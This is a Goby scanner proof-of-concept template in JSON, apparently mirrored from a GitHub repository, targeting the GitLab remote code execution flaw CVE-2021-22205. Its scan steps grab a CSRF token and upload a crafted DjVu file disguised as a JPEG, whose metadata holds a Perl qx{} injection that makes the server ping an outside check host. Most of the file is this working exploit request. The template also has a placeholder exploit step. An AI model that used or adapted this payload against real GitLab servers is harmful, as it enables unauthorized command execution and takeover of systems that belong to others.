mirror of https://github.com/qwqdanchun/Goby.git
144 lines
6.3 KiB
JSON
144 lines
6.3 KiB
JSON
{
|
|
"Name": "GitLab RCE CVE-2021-22205",
|
|
"Level": "3",
|
|
"Tags": [
|
|
"rce"
|
|
],
|
|
"GobyQuery": "app=\"gitlab\" || title=\"gitlab\"",
|
|
"Description": "GitLab is The DevOps Platform.",
|
|
"Product": "GitLab",
|
|
"Homepage": "https://about.gitlab.com/",
|
|
"Author": "",
|
|
"Impact": "An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.",
|
|
"Recommendation": "",
|
|
"References": [
|
|
"https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator",
|
|
"https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196",
|
|
"https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json",
|
|
"https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/",
|
|
"https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/",
|
|
"https://hackerone.com/reports/1154542",
|
|
"https://nvd.nist.gov/vuln/detail/CVE-2021-22205"
|
|
],
|
|
"HasExp": true,
|
|
"ExpParams": null,
|
|
"ExpTips": {
|
|
"Type": "",
|
|
"Content": ""
|
|
},
|
|
"ScanSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "GET",
|
|
"uri": "/users/sign_in",
|
|
"follow_redirect": true,
|
|
"header": null,
|
|
"data_type": "text",
|
|
"data": "",
|
|
"set_variable": []
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$head",
|
|
"operation": "contains",
|
|
"value": "experimentation_subject_id",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"X-CSRF-Token|lastbody|regex|name=\\\"csrf-token\\\" content=\\\"([\\s\\S]+?)\\\" />",
|
|
"output|lastbody|text|"
|
|
]
|
|
},
|
|
{
|
|
"Request": {
|
|
"method": "POST",
|
|
"uri": "/uploads/user",
|
|
"follow_redirect": false,
|
|
"header": {
|
|
"X-CSRF-Token": "{{{X-CSRF-Token}}}",
|
|
"Content-Type": "multipart/form-data; boundary=---------------------------99652559321225150602861519786",
|
|
"X-Requested-With": "XMLHttpRequest"
|
|
},
|
|
"data_type": "text",
|
|
"data": "-----------------------------99652559321225150602861519786\r\nContent-Disposition: form-data; name=\"file\"; filename=\"demo.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\u0000\u0000\u0000tDJVUINFO\u0000\u0000\u0000\r\n\u0000\u0000\u0000\u0000\u0018\u0000,\u0001\u0016\u0001BGjp\u0000\u0000\u0000\u0000ANTa\u0000\u0000\u0000N(metadata\r\n\t(Copyright \"\\\r\n\" . qx{ping -c1 {{{check}}} } . \\\r\n\" b \") )\r\n\r\n-----------------------------99652559321225150602861519786--\r\n",
|
|
"set_variable": []
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "422",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "Failed to process image",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody||"
|
|
]
|
|
}
|
|
],
|
|
"ExploitSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "GET",
|
|
"uri": "/test.php",
|
|
"follow_redirect": true,
|
|
"header": null,
|
|
"data_type": "text",
|
|
"data": "",
|
|
"set_variable": []
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "test",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody|regex|"
|
|
]
|
|
}
|
|
],
|
|
"PostTime": "0000-00-00 00:00:00",
|
|
"GobyVersion": "0.0.0"
|
|
} |